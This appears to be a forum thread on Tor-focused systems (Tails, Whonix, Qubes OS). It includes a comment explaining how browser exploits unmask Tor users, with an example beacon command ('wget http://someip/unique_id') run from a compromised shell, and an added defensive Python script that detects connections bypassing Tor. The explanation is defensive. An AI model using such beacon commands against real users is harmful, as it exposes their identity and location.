
Tails is great. I have been using it for several years now.

Other related projects are Whonix ( https://www.whonix.org ), which consists of two virtual machines: a workstation to work on and a gateway, which torifies all traffic from the workstation VM.

Whonix is also integrated in Qubes OS ( https://www.qubes-os.org ), which allows you to easily work with multiple separate Whonix VMs. There is also the possibility to tunnel all internet traffic of your machine through Tor, including system upgrades of the host OS itself.




Whonix/Qubes integration is excellent, and it's certainly a nice perk of Qubes.

To clarify the benefits of the "two VM" approach:

Most of the unmasking exploits against Tor users (as distinguished from unmasking Tor hidden services) involve getting a browser to ignore the proxy settings, somehow. I believe WebRTC, Flash, and various other things have been used to cause the browser to beacon out to some endpoint - you exploit the kitty picture site, and put in code to exploit the browser, which then makes a direct request to http://someip/unique_identifier - and, boom, you've got the user's IP, probable cause, the works.

This happens because a "typical" Tor install is the daemon running locally, but nothing prevents other binaries from making a direct connection out. You set the browser to use socks5://localhost:9050 or something as the proxy, but if you can either get some part of it to misbehave, or just spawn off a different process, it doesn't obey the proxy settings and goes straight out.

Whonix solves this problem by splitting the system into the workstation VM (what you interact with) and the gateway VM (that connects to Tor and "torifies" traffic). The only network port on the workstation VM is connected to the input port on the gateway VM - and everything coming in that port is routed through Tor, via the other (internet connected) port.

So, if you manage to exploit the workstation VM, the attacker still doesn't gain an IP - because they launch a shell that runs 'wget http://someip/unique_id', but that goes out through the gateway VM, and gets encapsulated into Tor before going out, so it still pops out some Tor exit node, not your home IP address.

It raises the bar rather substantially for using Tor, and avoids a lot of the various ways to get Tor to leak. Also, they ship a copy of the Tor Browser in Whonix, which disables a lot of high-risk functionality and allows you to very easily disable automatic media parsing and JavaScript and such.

Qubes is awesome, and the integrated Whonix stuff is just a beautiful integration.
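
The single-host weakness described in the comment above (a local Tor daemon, with nothing stopping other processes from connecting out directly) can be checked for from the defender's side. The following is an added example, not part of the thread or of any project mentioned in it: it parses `ss -tnp` output and reports established connections that neither go to loopback (the local SOCKS port) nor belong to the Tor daemon. The sample output, the process name `tor`, and the function names are assumptions made for the illustration.

```python
import ipaddress
import re

# Constructed sample of `ss -tnp` output on a single-host Tor setup (not from the thread).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
ESTAB  0      0      127.0.0.1:40112      127.0.0.1:9050     users:(("firefox",pid=2101,fd=88))
ESTAB  0      0      127.0.0.1:9050       127.0.0.1:40112    users:(("tor",pid=911,fd=12))
ESTAB  0      0      192.168.1.23:51822   198.51.100.7:9001  users:(("tor",pid=911,fd=9))
ESTAB  0      0      192.168.1.23:40650   203.0.113.50:80    users:(("wget",pid=4242,fd=3))
ESTAB  0      0      [::1]:53344          [::1]:9050         users:(("curl",pid=4300,fd=5))
"""

PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')


def split_endpoint(endpoint):
    """Split 'host:port' or '[v6host]:port' into (ip_address, port)."""
    host, _, port = endpoint.rpartition(":")
    ip = ipaddress.ip_address(host.strip("[]"))
    # Treat IPv4-mapped IPv6 (::ffff:127.0.0.1) as the IPv4 address it wraps.
    mapped = getattr(ip, "ipv4_mapped", None)
    return (mapped or ip), int(port)


def find_direct_connections(ss_output, tor_process="tor"):
    """Return (process, pid, peer_ip, peer_port) for connections bypassing Tor."""
    leaks = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "ESTAB":
            continue  # header, blank line, or a socket that is not connected
        peer_ip, peer_port = split_endpoint(fields[4])
        match = PROC_RE.search(fields[5]) if len(fields) > 5 else None
        # Without privileges ss may omit the owner; still report the socket.
        name, pid = (match.group(1), int(match.group(2))) if match else ("unknown", -1)
        if peer_ip.is_loopback or name == tor_process:
            continue  # traffic to the local proxy, or Tor's own circuits
        leaks.append((name, pid, str(peer_ip), peer_port))
    return leaks


if __name__ == "__main__":
    for name, pid, ip, port in find_direct_connections(SAMPLE_SS):
        print(f"direct connection bypassing Tor: {name} (pid {pid}) -> {ip}:{port}")
```

On a real host, feed it the output of `ss -tnp` run as root so that process names are populated for all sockets.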


> Whonix is also integrated in Qubes OS ( https://www.qubes-os.org )

Qubes-Whonix with fully ephemeral disposable VMs is the future. It would be a total killer for nearly every use case of Tails besides ease of use.

Note that this is in the works, but not fully implemented by default yet. https://github.com/anywaydense/QubesEphemerize

> The steps below outline how to make all PVH DispVM's permanently fully ephemeral. All data written to the disk will be encrypted with an ephemeral encryption key only stored in RAM. The encryption and encryption key generation is handled by dom0 and is thus inaccessible to the VM.


Tried to use it on my M1 MBA but it barfed. So I guess it is only for x86/64 architectures.



